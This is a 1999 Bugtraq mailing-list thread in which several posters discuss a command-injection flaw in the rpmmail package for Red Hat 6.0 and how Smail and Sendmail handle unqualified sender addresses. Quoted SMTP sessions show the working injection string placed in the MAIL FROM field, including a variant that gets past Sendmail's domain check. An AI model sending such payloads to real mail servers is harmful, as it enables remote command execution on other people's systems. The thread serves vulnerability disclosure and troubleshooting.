Re: RH6.0 local/remote command execution

[btellier () WEBLEY COM (Brock Tellier)]

Alright, this is getting a little silly.  THIS IS NOT A HOLE IN SENDMAIL
OR ANY OTHER MTA! AHH!  PLEASE read the entire post before emailing me or
this list about how it does or does not work!

To review: This is a hole in the RPMMAIL PACKAGE!  RPMMAIL sets up an
account called rpmmail and a .forward file that executes
/home/rpmmail/rpmmail by piping the message recieved from whatever MTA
you use into it.  Thus all we need is for the MTA to pipe a message to
rpmmail that contains metacharacters in the From: field. That's it.  The
only discussion of MTA's is about whether Sendmail or Smail will allow
from fields which do not contain the "@whatever.com" piece.  Smail does
not require this, Sendmail does.  Period.

-Brock

> ok This is what I have done and it does not work on RedHat 6.0
>
> Script started on Tue Oct 12 10:17:23 1999
> [> [root@blair /tmp]# uname -a
> Linux blair.idefense.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686
> unknown
> [> [root@blair /tmp]# ls -l /tmp/test
> - -rwxr-xr-x   1 fiji     fiji           57 Oct 11 14:53 /tmp/test
> [> [root@blair /tmp]# cat /tmp/test
> #!/bin/sh
> echo "you have been hacked" > /tmp/test.output
> [> [root@blair /tmp]# telnet localhost 25
> Trying 127.0.0.1... Connected to localhost. Escape character is '^]'.
> 220 blair.ipartnership.com ESMTP Sendmail 8.9.3/8.9.3; Tue, 12 Oct
> 1999 10:17:50 -0400
> mail from: ;/tmp/test;@microsoft.com
> 250 ;/tmp/test;@microsoft.com... Sender ok
> rcpt to: root
> 250 root... Recipient ok
> data
> 354 Enter mail, end with "." on a line by itself
> testing
> .
> 250 KAA15029 Message accepted for delivery
> quit
> 221 blair.ipartnership.com closing connection
> Connection closed by foreign host. [> Connection closed by foreign host. [root@blair /tmp]# ls -l /tmp
> total 817
> drwx------   2 root     root         1024 Sep 21 10:53 orbit-root
> - -rw-rw-r--   1 root     root            0 Oct 12 10:17 output
> - -rwxr-xr-x   1 root     root        10240 Oct  7 14:15
> sniffit.0.3.5.p1.tar
> - -rwxr-xr-x   1 root     root       819200 Oct  7 14:16
> sniffit.0.3.5.tar
> - -rwxr-xr-x   1 fiji     fiji           57 Oct 11 14:53 test
> [> [root@blair /tmp]#
> Script done on Tue Oct 12 10:18:27 1999
>
>
> as we can see there is no /tmp/test.output.
>
>
> - -Fiji
>
>
> - -----Original Message-----
> From: Brock Tellier [mailto:btellier () WEBLEY COM]
> Sent: Monday, October 11, 1999 12:02 PM
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: Re: RH6.0 local/remote command execution
>
>
> There seems to be some confusion regarding this post.  Let me try to
> explain.
>
> This post is titled "RH6.0 local/remote command execution" only
> because
> rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of
> course, install rpmmail on any other linux variant, such as SuSE,
> which
> is what I did.  I believe I made this clear when I pasted:
>
> > bash-2.03$ cat /etc/SuSE-release;uname -a;id
> > SuSE Linux 6.2 (i386)
> > VERSION = 6.2
> > Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
> > uid=100(xnec) gid=100(users) groups=100(users)
>
> In any case, as "D" pointed out,
>
> > MAIL FROM: ;/command/to/execute;
> > 553 ;/command/to/execute;... Domain name required
> > MAIL FROM: ;/command/to/execute;@microsoft.com
> > 250 ;/command/to/execute;@microsoft.com... Sender ok
>
> should work on sendmail 8.9.3.
>
> - -Brock
>
>
>
> > That does not look like the MTA that comes with RH 6.0. That is
> smail
> not
> > sendmail. I tryed this on my RH 6.0 install and it didn't work.
> > Notice the "220 fear62 Smail-3.2"
> > It's not sendmail.
> >
> >
> > -----Original Message-----
> > From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of
> Neezam
> > Haniff
> > Sent: Wednesday, October 06, 1999 12:50 PM
> > To: BUGTRAQ () SECURITYFOCUS COM
> > Subject: RH6.0 local/remote command execution
> >
> >
> > Hi,
> >
> > Here are some comments below...
> >
> > > The remote exploit is merely:
> > > bash-2.03$ telnet localhost 25
> > > Trying 127.0.0.1...
> > > Connected to localhost.
> > > Escape character is '^]'.
> > > 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
> > 11:31:13 -0500
> > > (CDT)
> > > MAIL FROM: ;/command/to/execute;
> > > 250 <;/command/to/execute;> ... Sender Okay
> > > RCPT TO: rpmmail
> > > 250 <rpmmail> ... Recipient Okay
> > > data
> > > 354 Enter mail, end with "." on a line by itself
> > > .
> > > 250 Mail accepted
> > > quit
> >
> > I find this odd that this exploit could exist on a Red Hat 6.0
> installation.
> > sendmail 8.9.3 is the mailer that is installed and the way it's been
> > configured, there's no way it would accept that sender address since
> it's
> > not qualifiable. Please confirm this. This is what I get when I test
> this
> > scenario on a Red Hat 6.0 system:
> >
> > [> > [nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
> > Trying 127.0.0.1...
> > Connected to localhost.
> > Escape character is '^]'.
> > 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
> > 13:31:55 -0400
> > helo x.x
> > 250 dhcp-160-190.x.x Hello IDENT:> > 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost
> [127.0.0.1], pleased
> to
> > meet you
> > MAIL FROM: ;/command/to/execute;
> > 553 ;/command/to/execute;... Domain name required
> >
> > The only way someone could take advantage of this exploit is if
> their
> mailer
> > configuration allows for the sender to non-qualifiable.
> >
> > Neezam.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.0.2
> Comment: Encrypted Document from Infrastructure Defense, Inc.
>
> iQA/AwUBOANEhIKtj2fJZe4vEQK+FwCbBKM5fYtsEAI3TCYnFEmxZXs0tQEAoLQw
> Ho6rCei3wCD8Xfb3Q5+I7XSd
> =8GsP
> -----END PGP SIGNATURE-----